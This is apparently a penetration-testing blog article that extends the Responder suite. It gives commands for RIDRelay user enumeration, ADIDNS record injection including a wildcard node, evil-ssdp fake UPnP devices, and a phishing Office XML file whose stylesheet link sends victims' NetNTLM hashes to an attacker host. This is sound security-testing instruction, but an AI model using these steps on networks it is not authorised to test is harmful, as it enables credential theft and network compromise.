In the previous two articles in this series we covered
various ideas and theories on how to expand and utilise the entire Responder
suite. This article is going to focus on expanding the suite further with a
focus on practical usages for your penetration tests. If you have not already
read the previous two articles in the series, you can find them on this website. I strongly advise
that you read these two articles before this one, as this article assumes the
knowledge contained within them.
Practical Applications – Identifying Targets
The primary difficulty with using MultiRelay is the
identification and capturing of admin users and their hashes. Whilst you can
specify an "ALL" parameter within MultiRelay if you are using the
following techniques effectively this will likely create a lot of failed login
attempt noise on the network. The tool RIDRelay, created by skorov allows us to
enumerate all users on a domain with RID cycling using the hash passing. This
tool can help us find admin users and other targets, privileges are not
required.
To execute this attack successfully you merely need to start
the tool using ridrelay.py –t <target> where the target parameter is a
host on the domain. You can also use the –o parameter to output enumerated
usernames to a file.
Example command: python ridrelay.py –t 192.168.1.11 –o
output.txt
The final step in the process is to get a user on the domain
to connect to the SMB server within RIDRelay. To do this you can use any of the
methods mentioned in the previous articles or one of the methods introduced
below. Make sure that you turn off the SMB server in Responder temporarily if
you started Responder before RIDRelay, or it will fail to bind to the necessary
ports.
Practical Applications – ADIDNS
Since this method's history and technical background is so
beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/,
we will only cover the basic practical usage of the tool. If you want to learn
how this tool works and its history, please go and read the aforementioned
article.
By manipulating dynamic DNS updates we are able to insert
DNS records into ADIDNS if the default secure dynamic updates setting is
enabled. Using the tool linked to below you can insert various records using
the following commands:
Run this first:
Import-Module
$PWD\Invoke-DNSUpdate.ps1
Import-Module
$PWD\Powermad.ps1
Invoke-DNSUpdate –DNSType <type> -DNSName
<subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate –DNSType A -DNSName
smb.domain.local -DNSData 192.168.1.11
By inserting a new A record into ADIDNS we could re-route traffic from a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record which will resolve as a fall back option for all DNS queries that do not exist within the DNS zone. This acts much like LLMNR/NBNS spoofing but may be available when they are not. You can also exploit WPAD through Responder even when LLMNR or wildcard additions are not available by adding a wpad record to the DNS zone.
New-ADIDNSNode –Node *
There are some limitations to what records you can and
cannot add discussed in the article above, in essence; you will be unable to
edit existing DNS records but are able to add new ones.
The download for this tool can be found on its GitHub page
here: https://github.com/Kevin-Robertson/Powermad
Practical Applications – SSDP
Another excellent tool which can help you exploit a Windows
network is evil-ssdp. This tool creates a fake UPnP device using SSDP spoofing
which will appear in users' Windows Explorer windows. When a user clicks on one
of these fake UPnP devices, they can be redirected to malicious web pages which
will allow you to grab their NetNTLM hash. As an interesting secondary
capability, the tool is also capable of identifying XML related vulnerabilities
in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 –t Microsoft-azure
After running this command Windows devices on your local
network will begin to detect your fake UPnP device and will display it to
users. If the users click on this device, evil-ssdp will attempt to make an SMB
connection back to your attacking machine. To intercept this and grab hashes or
execute a hash passing attack make sure you are running Responder as discussed
in previous articles. This will only work on old browsers that still support
the file:// tag. The phishing functionality, which is shown below, works in all
browsers.
If you wish to maximise the effectiveness of this tool, I
highly recommend creating your own template file to mimic the environment a user
would normally see when visiting an internal website. A section on creating
your own templates can be found towards the bottom of the Gitlab page, which
can be found here: https://gitlab.com/initstring/evil-ssdp
Practical Applications – XML Office Files
This method is discussed in detail in this post here: https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
This attack method can be used very effectively in an email
phishing campaign against a domain, especially when targeted at admin users
identified by RIDRelay. To create an XML file which will send the reader's hash
to your Responder instance create the following XML file in a text editor:
<?xml version="1.0" encoding="utf-8"
?>
<?mso-application prodgid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href=\\<Your
Responder IP\directory\file.xsl?>
If you wish to add content to the Word document to make it
look legitimate, you can first generate the document in Word and save it as an
XML file via the Save As menu. After doing this, you can insert the third line
of code in the XML code above into the top of your XML file. This method can be
executed with multiple types of Office document including Excel spread sheets.
When your victim opens this file they will be prompted to select an Office
application to open it with if they have not opened an Office XML file before.
If the target domain/host has a text editor assigned to read XML files by
default, this attack is unlikely to work.
For further information on this attack, I highly recommend
reading the article linked above.
Summary
Thank you for reading my practical guide to Responder, which
builds upon my previous two guides for Intermediate and Advanced usage of the
tool. If I find more ways to utilise the Responder suite in the future, I will
issue another article discussing them. Responder is an extremely flexible tool,
not just a niche attack for LLMNR/NBNS spoofing, as such; I highly recommend
you seek out your own methods to expand your suite as well.